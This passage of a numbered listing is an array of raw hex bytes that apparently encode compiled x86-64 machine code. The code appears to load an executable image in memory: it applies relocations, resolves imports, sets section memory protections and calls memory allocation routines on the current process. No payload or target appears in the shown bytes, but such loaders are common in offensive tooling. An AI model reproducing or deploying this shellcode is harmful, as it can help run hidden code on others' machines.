1115 0x48, 0x8b, 0x85, 0x30, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b,
1116 0x85, 0x40, 0x04, 0x00, 0x00, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x30,
1117 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0xe9, 0xbb, 0x00, 0x00, 0x00, 0x48,
1118 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0,
1119 0xf0, 0x3c, 0x30, 0x75, 0x25, 0x48, 0x8b, 0x85, 0x30, 0x04, 0x00, 0x00,
1120 0x48, 0x8b, 0x10, 0x48, 0x8b, 0x85, 0x40, 0x04, 0x00, 0x00, 0x89, 0xc0,
1121 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x30, 0x04, 0x00, 0x00, 0x48, 0x89,
1122 0x10, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00,
1123 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0x10, 0x75, 0x27,
1124 0x48, 0x8b, 0x85, 0x30, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b,
1125 0x85, 0x40, 0x04, 0x00, 0x00, 0x48, 0xc1, 0xe8, 0x10, 0x0f, 0xb7, 0xc0,
1126 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x30, 0x04, 0x00, 0x00, 0x48, 0x89,
1127 0x10, 0xeb, 0x4b, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x0f, 0xb6,
1128 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0x20, 0x75, 0x23, 0x48, 0x8b, 0x85,
1129 0x30, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b, 0x85, 0x40, 0x04,
1130 0x00, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x30,
1131 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0xeb, 0x16, 0x48, 0x8b, 0x85, 0xc0,
1132 0x04, 0x00, 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x84, 0xc0,
1133 0x0f, 0x85, 0x28, 0x0e, 0x00, 0x00, 0x48, 0x83, 0x85, 0xc0, 0x04, 0x00,
1134 0x00, 0x02, 0x48, 0x8b, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x04,
1135 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x48, 0x01, 0xd0,
1136 0x48, 0x39, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x0f, 0x85, 0x8a, 0xfe, 0xff,
1137 0xff, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x48, 0x89, 0x85, 0xb8,
1138 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x8b, 0x8d, 0x3c, 0x04, 0x00,
1139 0x00, 0x8b, 0x95, 0x5c, 0x04, 0x00, 0x00, 0x48, 0x01, 0xca, 0x48, 0x01,
1140 0xd0, 0x48, 0x39, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x73, 0x12, 0x48, 0x8b,
1141 0x85, 0xb8, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x04, 0x85, 0xc0, 0x0f, 0x85,
1142 0x34, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b,
1143 0x80, 0x90, 0x00, 0x00, 0x00, 0x89, 0x85, 0x3c, 0x04, 0x00, 0x00, 0x83,
1144 0xbd, 0x3c, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xaa, 0x01, 0x00, 0x00,
1145 0x8b, 0x95, 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01,
1146 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x04, 0x00, 0x00, 0xe9, 0x7f, 0x01, 0x00,
1147 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x0c, 0x89,
1148 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x28,
1149 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x28, 0x04, 0x00, 0x00, 0x48, 0x89,
1150 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00, 0xe8, 0xe1, 0xd9, 0xff,
1151 0xff, 0x48, 0x89, 0x85, 0x20, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8,
1152 0x04, 0x00, 0x00, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48,
1153 0x01, 0xd0, 0x48, 0x89, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85,
1154 0xd8, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x10, 0x89, 0xc2, 0x48, 0x8b, 0x45,
1155 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xe0, 0x04, 0x00, 0x00, 0x48,
1156 0x8b, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0,
1157 0x0f, 0x84, 0xf9, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x04, 0x00,
1158 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x79, 0x3d, 0x48, 0x8b, 0x85,
1159 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85,
1160 0x20, 0x04, 0x00, 0x00, 0x41, 0x89, 0xd1, 0x41, 0xb8, 0x00, 0x00, 0x00,
1161 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00, 0xe8,
1162 0x56, 0xd6, 0xff, 0xff, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xe0, 0x04,
1163 0x00, 0x00, 0x48, 0x89, 0x10, 0xe9, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b,
1164 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0x70,
1165 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x18, 0x04, 0x00, 0x00, 0x48, 0x8b,
1166 0x85, 0x18, 0x05, 0x00, 0x00, 0x8b, 0x40, 0x04, 0x85, 0xc0, 0x74, 0x3b,
1167 0x48, 0x8b, 0x85, 0x18, 0x04, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x02, 0x48,
1168 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00, 0xe8, 0x4d, 0x0d,
1169 0x00, 0x00, 0x85, 0xc0, 0x74, 0x1d, 0x48, 0x8b, 0x85, 0x10, 0x05, 0x00,
1170 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48,
1171 0x8b, 0x85, 0xe0, 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0xeb, 0x37, 0x48,
1172 0x8b, 0x85, 0x18, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x50, 0x02, 0x48, 0x8b,
1173 0x85, 0x20, 0x04, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49,
1174 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00,
1175 0xe8, 0xb9, 0xd5, 0xff, 0xff, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xe0,
1176 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x83, 0x85, 0xe8, 0x04, 0x00,
1177 0x00, 0x08, 0x48, 0x83, 0x85, 0xe0, 0x04, 0x00, 0x00, 0x08, 0xe9, 0xf4,
1178 0xfe, 0xff, 0xff, 0x90, 0x48, 0x83, 0x85, 0xd8, 0x04, 0x00, 0x00, 0x14,
1179 0x48, 0x8b, 0x85, 0xd8, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x0c, 0x85, 0xc0,
1180 0x0f, 0x85, 0x6f, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00,
1181 0x00, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00, 0x89, 0x85, 0x3c, 0x04, 0x00,
1182 0x00, 0x83, 0xbd, 0x3c, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x70, 0x01,
1183 0x00, 0x00, 0x8b, 0x95, 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70,
1184 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd0, 0x04, 0x00, 0x00, 0xe9, 0x45,
1185 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x04, 0x00, 0x00, 0x8b, 0x40,
1186 0x04, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89,
1187 0x85, 0x28, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x28, 0x04, 0x00, 0x00,
1188 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00, 0xe8, 0x17,
1189 0xd8, 0xff, 0xff, 0x48, 0x89, 0x85, 0x20, 0x04, 0x00, 0x00, 0x48, 0x83,
1190 0xbd, 0x20, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xf4, 0x00, 0x00, 0x00,
1191 0x48, 0x8b, 0x85, 0xd0, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x10, 0x89, 0xc2,
1192 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xe8, 0x04,
1193 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x0c,
1194 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
1195 0xe0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48,
1196 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xb0, 0x00, 0x00, 0x00, 0x48,
1197 0x8b, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0,
1198 0x79, 0x3a, 0x48, 0x8b, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x00,
1199 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x20, 0x04, 0x00, 0x00, 0x41, 0x89, 0xd1,
1200 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
1201 0x10, 0x05, 0x00, 0x00, 0xe8, 0x7d, 0xd4, 0xff, 0xff, 0x48, 0x89, 0xc2,
1202 0x48, 0x8b, 0x85, 0xe0, 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0xeb, 0x4f,
1203 0x48, 0x8b, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b,
1204 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x18, 0x04, 0x00, 0x00,
1205 0x48, 0x8b, 0x85, 0x18, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x50, 0x02, 0x48,
1206 0x8b, 0x85, 0x20, 0x04, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00,
1207 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00,
1208 0x00, 0xe8, 0x2c, 0xd4, 0xff, 0xff, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85,
1209 0xe0, 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x83, 0x85, 0xe8, 0x04,
1210 0x00, 0x00, 0x08, 0x48, 0x83, 0x85, 0xe0, 0x04, 0x00, 0x00, 0x08, 0xe9,
1211 0x40, 0xff, 0xff, 0xff, 0x90, 0xeb, 0x01, 0x90, 0x48, 0x83, 0x85, 0xd0,
1212 0x04, 0x00, 0x00, 0x20, 0x48, 0x8b, 0x85, 0xd0, 0x04, 0x00, 0x00, 0x8b,
1213 0x40, 0x04, 0x85, 0xc0, 0x0f, 0x85, 0xa9, 0xfe, 0xff, 0xff, 0x48, 0x8b,
1214 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x28, 0x89, 0xc2, 0x48, 0x8b,
1215 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x10, 0x04, 0x00, 0x00,
1216 0x48, 0x8b, 0x95, 0x78, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xb0, 0x02,
1217 0x00, 0x00, 0x49, 0x89, 0xd0, 0xba, 0x21, 0x00, 0x00, 0x00, 0x48, 0x89,
1218 0xc7, 0x4c, 0x89, 0xc6, 0x48, 0x89, 0xd1, 0xf3, 0x48, 0xa5, 0x48, 0xc7,
1219 0x85, 0xb8, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x85,
1220 0xb6, 0x02, 0x00, 0x00, 0x0f, 0xb7, 0xd0, 0x48, 0x89, 0xd0, 0x48, 0xc1,
1221 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0x45,
1222 0x58, 0x48, 0x8d, 0x4d, 0x58, 0x48, 0x8d, 0x85, 0xb8, 0x03, 0x00, 0x00,
1223 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x30,
1224 0xc7, 0x44, 0x24, 0x28, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20,
1225 0x00, 0x30, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x41, 0xb8, 0x00, 0x00, 0x00,
1226 0x00, 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8,
1227 0x9f, 0x33, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd,
1228 0x54, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x5c, 0x0a, 0x00, 0x00, 0x0f,
1229 0xb7, 0x85, 0xb6, 0x02, 0x00, 0x00, 0x0f, 0xb7, 0xd0, 0x89, 0xd0, 0xc1,
1230 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x89, 0xc1, 0x48, 0x8b, 0x85,
1231 0xb8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x48, 0x04, 0x00, 0x00, 0x41,
1232 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x46, 0x2b, 0x00, 0x00, 0x48, 0x8b,
1233 0x85, 0x10, 0x05, 0x00, 0x00, 0x8b, 0x80, 0x48, 0x05, 0x00, 0x00, 0x83,
1234 0xf8, 0x01, 0x75, 0x73, 0x48, 0x8b, 0x85, 0x10, 0x05, 0x00, 0x00, 0x0f,
1235 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x75, 0x41, 0x48, 0x8b,
1236 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b, 0x50, 0x54, 0x48, 0x8b, 0x45, 0x70,
1237 0x41, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8,
1238 0xc0, 0x2a, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b,
1239 0x50, 0x54, 0x48, 0x8b, 0x85, 0x88, 0x04, 0x00, 0x00, 0x41, 0x89, 0xd0,
1240 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x9f, 0x2a, 0x00,
1241 0x00, 0xeb, 0x20, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b, 0x48,
1242 0x54, 0x48, 0x8b, 0x55, 0x70, 0x48, 0x8b, 0x85, 0x88, 0x04, 0x00, 0x00,
1243 0x41, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0xc1, 0x2a, 0x00, 0x00, 0x48,
1244 0x8b, 0x85, 0x10, 0x05, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0xfb, 0x05, 0x00,
1245 0x00, 0x84, 0xc0, 0x0f, 0x85, 0xbe, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
1246 0x70, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48,
1247 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xa7, 0x31,
1248 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04,
1249 0x00, 0x00, 0x00, 0x0f, 0x88, 0x65, 0x09, 0x00, 0x00, 0x83, 0xbd, 0x58,
1250 0x04, 0x00, 0x00, 0x00, 0x74, 0x08, 0x48, 0xc7, 0x45, 0x70, 0x00, 0x00,
1251 0x00, 0x00, 0x48, 0xc7, 0x45, 0x68, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
1252 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x70, 0x48, 0x8b, 0x95,
1253 0x90, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x50, 0xc7, 0x44, 0x24,
1254 0x48, 0x80, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x00, 0x00,
1255 0x00, 0xc7, 0x44, 0x24, 0x38, 0x02, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55,
1256 0x68, 0x48, 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00,
1257 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00,
1258 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc2,
1259 0xff, 0xff, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0xed, 0x30, 0x00, 0x00,
1260 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00,
1261 0x00, 0x0f, 0x88, 0xda, 0x08, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x68, 0x48,
1262 0x8d, 0x45, 0x70, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x48, 0x89,
1263 0x54, 0x24, 0x28, 0x48, 0x8d, 0x95, 0x8c, 0x00, 0x00, 0x00, 0x48, 0x89,
1264 0x54, 0x24, 0x20, 0x41, 0xb9, 0x08, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8,
1265 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x76,
1266 0x31, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54,
1267 0x04, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x92, 0x08, 0x00, 0x00, 0xc7, 0x85,
1268 0xac, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x10, 0x03, 0x00,
1269 0x00, 0x48, 0x8b, 0x8d, 0xb8, 0x03, 0x00, 0x00, 0x8b, 0x95, 0xac, 0x04,
1270 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0,
1271 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0xc1, 0xe8,
1272 0x1e, 0x83, 0xe0, 0x01, 0x89, 0x85, 0xd4, 0x03, 0x00, 0x00, 0x48, 0x8b,
1273 0x8d, 0xb8, 0x03, 0x00, 0x00, 0x8b, 0x95, 0xac, 0x04, 0x00, 0x00, 0x48,
1274 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0,
1275 0x03, 0x48, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0xc1, 0xe8, 0x1f, 0x89, 0x85,
1276 0xd0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0xb8, 0x03, 0x00, 0x00, 0x8b,
1277 0x95, 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02,
1278 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x01, 0xc8, 0x8b, 0x40,
1279 0x24, 0xc1, 0xe8, 0x1d, 0x83, 0xe0, 0x01, 0x89, 0x85, 0xcc, 0x03, 0x00,
1280 0x00, 0x83, 0xbd, 0xd0, 0x03, 0x00, 0x00, 0x00, 0x74, 0x18, 0x83, 0xbd,
1281 0xcc, 0x03, 0x00, 0x00, 0x00, 0x74, 0x0f, 0xc7, 0x85, 0xa4, 0x04, 0x00,
1282 0x00, 0x80, 0x00, 0x00, 0x00, 0xe9, 0x06, 0x01, 0x00, 0x00, 0x83, 0xbd,
1283 0xd4, 0x03, 0x00, 0x00, 0x00, 0x74, 0x18, 0x83, 0xbd, 0xcc, 0x03, 0x00,
1284 0x00, 0x00, 0x74, 0x0f, 0xc7, 0x85, 0xa4, 0x04, 0x00, 0x00, 0x20, 0x00,
1285 0x00, 0x00, 0xe9, 0xe5, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xd4, 0x03, 0x00,
1286 0x00, 0x00, 0x74, 0x42, 0x83, 0xbd, 0xd0, 0x03, 0x00, 0x00, 0x00, 0x74,
1287 0x39, 0x83, 0xbd, 0xcc, 0x03, 0x00, 0x00, 0x00, 0x75, 0x30, 0x48, 0x8b,
1288 0x85, 0x10, 0x05, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00,
1289 0x84, 0xc0, 0x75, 0x0f, 0xc7, 0x85, 0xa4, 0x04, 0x00, 0x00, 0x08, 0x00,
1290 0x00, 0x00, 0xe9, 0xa9, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xa4, 0x04, 0x00,
1291 0x00, 0x04, 0x00, 0x00, 0x00, 0xe9, 0x9a, 0x00, 0x00, 0x00, 0x83, 0xbd,
1292 0xd4, 0x03, 0x00, 0x00, 0x00, 0x75, 0x1e, 0x83, 0xbd, 0xd0, 0x03, 0x00,
1293 0x00, 0x00, 0x75, 0x15, 0x83, 0xbd, 0xcc, 0x03, 0x00, 0x00, 0x00, 0x74,
1294 0x0c, 0xc7, 0x85, 0xa4, 0x04, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0xeb,
1295 0x73, 0x83, 0xbd, 0xd4, 0x03, 0x00, 0x00, 0x00, 0x74, 0x1e, 0x83, 0xbd,
1296 0xd0, 0x03, 0x00, 0x00, 0x00, 0x75, 0x15, 0x83, 0xbd, 0xcc, 0x03, 0x00,
1297 0x00, 0x00, 0x75, 0x0c, 0xc7, 0x85, 0xa4, 0x04, 0x00, 0x00, 0x02, 0x00,
1298 0x00, 0x00, 0xeb, 0x4c, 0x83, 0xbd, 0xd4, 0x03, 0x00, 0x00, 0x00, 0x75,
1299 0x1e, 0x83, 0xbd, 0xd0, 0x03, 0x00, 0x00, 0x00, 0x75, 0x15, 0x83, 0xbd,
1300 0xcc, 0x03, 0x00, 0x00, 0x00, 0x75, 0x0c, 0xc7, 0x85, 0xa4, 0x04, 0x00,
1301 0x00, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x25, 0x83, 0xbd, 0xd4, 0x03, 0x00,
1302 0x00, 0x00, 0x75, 0x1c, 0x83, 0xbd, 0xd0, 0x03, 0x00, 0x00, 0x00, 0x74,
1303 0x13, 0x83, 0xbd, 0xcc, 0x03, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xc7, 0x85,
1304 0xa4, 0x04, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0xb8,
1305 0x03, 0x00, 0x00, 0x8b, 0x95, 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xd0,
1306 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48,
1307 0x01, 0xc8, 0x8b, 0x40, 0x24, 0x25, 0x00, 0x00, 0x00, 0x04, 0x85, 0xc0,
1308 0x74, 0x0a, 0x81, 0x8d, 0xa4, 0x04, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00,
1309 0x48, 0x8b, 0x4d, 0x70, 0x4c, 0x8b, 0x85, 0xb8, 0x03, 0x00, 0x00, 0x8b,
1310 0x95, 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02,
1311 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x4c, 0x01, 0xc0, 0x8b, 0x40,
1312 0x0c, 0x89, 0xc0, 0x48, 0x01, 0xc8, 0x48, 0x89, 0x85, 0x98, 0x00, 0x00,
1313 0x00, 0x0f, 0xb7, 0x85, 0xb6, 0x02, 0x00, 0x00, 0x0f, 0xb7, 0xc0, 0x83,
1314 0xe8, 0x01, 0x39, 0x85, 0xac, 0x04, 0x00, 0x00, 0x73, 0x5b, 0x48, 0x8b,
1315 0x95, 0xb8, 0x03, 0x00, 0x00, 0x8b, 0x85, 0xac, 0x04, 0x00, 0x00, 0x83,
1316 0xc0, 0x01, 0x89, 0xc1, 0x48, 0x89, 0xc8, 0x48, 0xc1, 0xe0, 0x02, 0x48,
1317 0x01, 0xc8, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x0c,
1318 0x41, 0x89, 0xc0, 0x48, 0x8b, 0x8d, 0xb8, 0x03, 0x00, 0x00, 0x8b, 0x95,
1319 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48,
1320 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x01, 0xc8, 0x8b, 0x40, 0x0c,
1321 0x89, 0xc2, 0x4c, 0x89, 0xc0, 0x48, 0x29, 0xd0, 0x48, 0x89, 0x85, 0x90,
1322 0x00, 0x00, 0x00, 0xeb, 0x2a, 0x48, 0x8b, 0x8d, 0xb8, 0x03, 0x00, 0x00,
1323 0x8b, 0x95, 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0,
1324 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x01, 0xc8, 0x8b,
1325 0x40, 0x10, 0x89, 0xc0, 0x48, 0x89, 0x85, 0x90, 0x00, 0x00, 0x00, 0xc7,
1326 0x85, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x8b, 0x85,
1327 0xa4, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x90, 0x00, 0x00, 0x00, 0x48,
1328 0x8d, 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00,
1329 0x00, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x95, 0x8c, 0x00, 0x00,
1330 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8,
1331 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x5e,
1332 0x2e, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54,
1333 0x04, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x7d, 0x05, 0x00, 0x00, 0x83, 0x85,
1334 0xac, 0x04, 0x00, 0x00, 0x01, 0x0f, 0xb7, 0x85, 0xb6, 0x02, 0x00, 0x00,
1335 0x0f, 0xb7, 0xc0, 0x39, 0x85, 0xac, 0x04, 0x00, 0x00, 0x0f, 0x82, 0xda,
1336 0xfc, 0xff, 0xff, 0xc7, 0x85, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
1337 0x00, 0x8b, 0x85, 0xdc, 0x02, 0x00, 0x00, 0x89, 0xc0, 0x48, 0x89, 0x85,
1338 0x90, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x90, 0x00, 0x00, 0x00, 0x48,
1339 0x8d, 0x45, 0x70, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x48, 0x89,
1340 0x54, 0x24, 0x28, 0x48, 0x8d, 0x95, 0x8c, 0x00, 0x00, 0x00, 0x48, 0x89,
